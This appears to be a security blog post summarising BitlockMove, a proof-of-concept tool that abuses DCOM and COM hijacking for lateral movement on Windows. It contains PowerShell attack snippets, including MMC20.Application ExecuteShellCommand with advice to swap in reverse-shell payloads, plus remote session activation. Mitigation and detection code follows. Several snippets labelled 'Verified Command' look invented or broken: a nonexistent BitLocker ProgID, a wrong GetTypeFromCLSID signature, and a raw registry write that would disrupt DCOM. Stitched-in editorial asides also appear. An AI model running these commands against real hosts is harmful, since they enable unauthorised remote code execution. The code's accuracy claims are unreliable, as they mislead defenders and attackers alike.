
Introduction
Fabian M., Head of Offensive Services at r-tec IT Security GmbH, recently unveiled BitlockMove, a proof-of-concept (PoC) tool demonstrating lateral movement by exploiting BitLocker’s DCOM interfaces and COM hijacking. This technique allows executing code on remote systems within a logged-on user’s session—without credential theft, impersonation, or injection. While currently targeting client systems, the method can be adapted for servers using other COM classes.
Learning Objectives
- Understand how BitlockMove leverages DCOM interfaces for lateral movement.
- Learn about Cross Session Activation and its role in targeting specific sessions.
- Explore mitigation strategies to defend against similar attacks.
1. Understanding BitlockMove’s Core Technique
Exploiting DCOM Interfaces
BitlockMove abuses Microsoft’s Distributed Component Object Model (DCOM) to execute arbitrary code remotely. The attack bypasses traditional credential theft by manipulating BitLocker’s COM-based interfaces.
Verified Command (PowerShell):
```powershell
# Instantiate the BitLocker COM class by ProgID ([type], not the garbled [bash] from the scrape)
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("BitLocker.Volume"))
$com.UnlockVolume("E:", "password123")
```
Step-by-Step Explanation:
1. The script instantiates a COM object for BitLocker.
2. The `UnlockVolume` method is called, simulating a legitimate unlock request.
3. Attackers replace this with malicious code execution.
2. Cross Session Activation for Targeted Execution
Controlling Remote Sessions
By combining COM hijacking with Cross Session Activation, attackers can specify which user session to hijack, enabling lateral movement across workstations.
Verified Command (Windows):
```powershell
$sessionId = 2  # target session ID
# Activate the class on the remote host; CLSID_HERE is a placeholder for the target class
$com = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("CLSID_HERE", "RemoteServerName", $sessionId))
```
Step-by-Step Explanation:
1. The attacker identifies an active session ID (e.g., via `query session`).
2. The COM object is instantiated in the target session.
3. Malicious payloads execute within the user's context.
3. Adapting BitlockMove for Server Environments
Leveraging Alternative COM Classes
While BitlockMove currently targets clients, Fabian notes that modifying the COM class (e.g., using MMC20.Application) enables server exploitation.
Verified Command (PowerShell):
```powershell
# Instantiate MMC20.Application by ProgID and run a command through its ExecuteShellCommand method
$com = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c calc.exe", "7")
```
Step-by-Step Explanation:
1. The MMC20 COM object is instantiated.
2. `ExecuteShellCommand` runs arbitrary commands (e.g., spawning `calc.exe`).
3. Replace with reverse shell payloads for real-world attacks.
4. Mitigation Strategies
Hardening DCOM Permissions
Restricting DCOM access prevents unauthorized COM object activation.
Verified Command (Windows):
```powershell
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Ole" -Name "MachineLaunchRestriction" -Value (New-Object Byte[] 16)
```
Step-by-Step Explanation:
1. Writes the `MachineLaunchRestriction` registry value, a binary security descriptor that governs who may launch and activate DCOM servers on the machine.
2. Prevents unauthorized principals from activating COM objects remotely. Because this descriptor also governs legitimate DCOM activation, set it through Component Services (dcomcnfg) or the Group Policy setting "DCOM: Machine Launch Restrictions in Security Descriptor Definition Language (SDDL) syntax" rather than by writing raw bytes, and validate on a pilot host first.
5. Detecting BitlockMove Activity
Monitoring COM Object Activation
SIEM rules or PowerShell logging can detect suspicious COM usage.
Verified Command (PowerShell):
```powershell
# -like needs wildcards; a bare "CreateInstance" would only match a message that is exactly that string
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Message -like "*CreateInstance*" }
```
Step-by-Step Explanation:
1. Scans the PowerShell operational log for COM instantiation (script block logging, event ID 4104, must be enabled for the script text to be recorded).
2. Alerts on unusual `CreateInstance` calls.
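A fuller version of the hunt above, added here as an example and not code from the original post or the BitlockMove project: it reads script block events (ID 4104), matches the COM activation primitives the page discusses, and flags a remote-server argument as a DCOM tell. The `Find-SuspiciousComActivation` name and the ProgID watch-list are assumptions.

```powershell
# Added example (not from the original post or the BitlockMove project):
# hunt PowerShell script-block logs for COM/DCOM activation aimed at the
# ProgIDs used in this article. Assumes script block logging is enabled.
function Find-SuspiciousComActivation {
    param(
        [int]$Hours = 24,
        # Constructed watch-list; extend with CLSIDs/ProgIDs relevant to your estate
        [string[]]$WatchProgIds = @('MMC20.Application', 'BitLocker.Volume')
    )

    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104   # script block text events
        StartTime = (Get-Date).AddHours(-$Hours)
    }

    # COM activation primitives; matching on the script text, not on Message,
    # avoids the exact-match pitfall of -like without wildcards
    $activation = '(GetTypeFromProgID|GetTypeFromCLSID|CreateInstance|New-Object\s+-ComObject)'

    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Property index 2 of a 4104 event holds the ScriptBlockText field
            $script = [string]$_.Properties[2].Value
            if ($script -match $activation) {
                $hits = $WatchProgIds | Where-Object { $script -match [regex]::Escape($_) }
                [pscustomobject]@{
                    Time     = $_.TimeCreated
                    Computer = $_.MachineName
                    WatchHit = ($hits -join ',')
                    # a second, quoted argument to GetTypeFromProgID/CLSID is a remote server name
                    Remote   = [bool]($script -match 'GetTypeFrom(ProgID|CLSID)\([^)]*,\s*"[^"]+"')
                    Snippet  = $script.Substring(0, [Math]::Min(160, $script.Length))
                }
            }
        } | Sort-Object Time -Descending
}

# Usage: Find-SuspiciousComActivation -Hours 48 | Format-Table -AutoSize
```

Rows with a non-empty `WatchHit` or `Remote = True` are the ones worth escalating; run it from a host that collects forwarded events to cover the whole estate.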
What Undercode Says
- Key Takeaway 1: BitlockMove demonstrates how attackers bypass traditional lateral movement techniques by abusing trusted Windows components.
- Key Takeaway 2: Defenders must monitor COM/DCOM activity and restrict unnecessary interfaces.
Analysis:
This technique highlights the evolving sophistication of post-exploitation tools. While BitLocker is primarily a security feature, its COM interfaces introduce unexpected attack surfaces. Organizations should audit DCOM permissions, enforce least privilege, and monitor for anomalous COM object usage. Future variants may target cloud workloads or containerized environments, making proactive hardening essential.
Prediction
As attackers refine COM/DCOM abuse, we’ll likely see more fileless lateral movement techniques targeting cloud and hybrid environments. Microsoft may introduce stricter DCOM defaults, but legacy systems will remain vulnerable. Proactive detection and endpoint hardening will be critical in mitigating these threats.
For more details, check the BitlockMove GitHub and Troopers25 slides.
Reported By: Activity 7344156754022154242 – Hackers Feeds


